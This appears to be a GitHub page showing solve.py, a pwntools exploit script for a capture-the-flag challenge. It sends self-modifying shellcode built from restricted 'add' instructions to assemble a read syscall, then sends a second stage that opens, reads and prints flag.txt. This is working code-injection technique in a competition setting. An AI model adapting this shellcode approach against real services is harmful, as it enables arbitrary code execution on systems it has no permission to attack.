-
Notifications
You must be signed in to change notification settings - Fork 12
/
Copy pathsolve.py
executable file
·141 lines (128 loc) · 2.05 KB
/
solve.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
#!/usr/bin/env python3
from pwn import *
exe = ELF('./bin/main')
context.binary = exe
host = args.HOST or 'localhost'
port = args.PORT or 31034
def local():
return process([exe.path, '500'], cwd='./bin')
def conn():
if args.LOCAL:
return local()
else:
return remote(host, port)
def debug():
if args.LOCAL:
gdb.attach(r, gdbscript=gdbscript)
pause()
gdbscript = f'''
file {exe.path}
pie br *0x16a1
c
'''
r = conn()
# good luck pwning :)
r.recvuntil('the current limit is ')
limit = int(r.recvuntil(' '))
log.info(f'limit: {limit}')
cod = asm('''
// 13371337
add dword ptr [rip+1], eax
// double eax + 0x05050505
.byte 5
.byte 5
.byte 5
.byte 5
.byte 5
// 2b732b73 -> 3088438b
add eax, 0x05050505
add eax, 0x00050505
add eax, 0x00050505
add eax, 0x00050505
add eax, 0x00010404
add dword ptr [rip], eax
// creates nop; lea rsi, [rip]
.byte 5
.byte 5
.byte 5
.byte 5
.byte 0
.byte 0
.byte 0
.byte 0
// 3088438b
add al, 5
add al, 5
add al, 5
add al, 5
add al, 5
add al, 5
add al, 5
add al, 5
add al, 5
add al, 2
add byte ptr [rip], al
// creates mov edx, 0x500
.byte 0
.byte 0
.byte 5
.byte 0
.byte 0
add byte ptr [rip], al
// creates mov edi, 0
.byte 5
.byte 0
.byte 0
.byte 0
.byte 0
// 308843ba
add dword ptr [rip+1], eax
// double eax
.byte 5
.byte 5
.byte 5
.byte 5
.byte 5
// 66158c79
add eax, 0x05050505
add eax, 0x05050505
add eax, 0x05050205
add eax, 0x05050005
add eax, 0x05050005
add eax, 0x05050005
add eax, 0x01050005
add eax, 0x00050005
add eax, 0x00050005
add eax, 0x00050005
add eax, 0x00050005
add eax, 0x00050005
add eax, 0x00050005
add eax, 0x00050005
add eax, 0x00040005
add al, 2
// 855f98c6
add dword ptr [rip+1], eax
// double eax
.byte 5
.byte 0
.byte 0
.byte 0
.byte 0
// 0abf318c
add dword ptr [rip], eax
// creates nop; xor eax, eax; syscall
.byte 4
.byte 0
.byte 1
.byte 5
.byte 5
''')
debug()
print(len(cod)) # 202
r.send(cod.ljust(limit, b'\n'))
sc = 'mov rsp, 0x420691337800\n' + \
shellcraft.open('flag.txt') + \
shellcraft.read('rax', 'rsp', 100) + \
shellcraft.write(1, 'rsp', 100)
r.send(b'A'*0x98 + asm(sc))
print(r.recvall())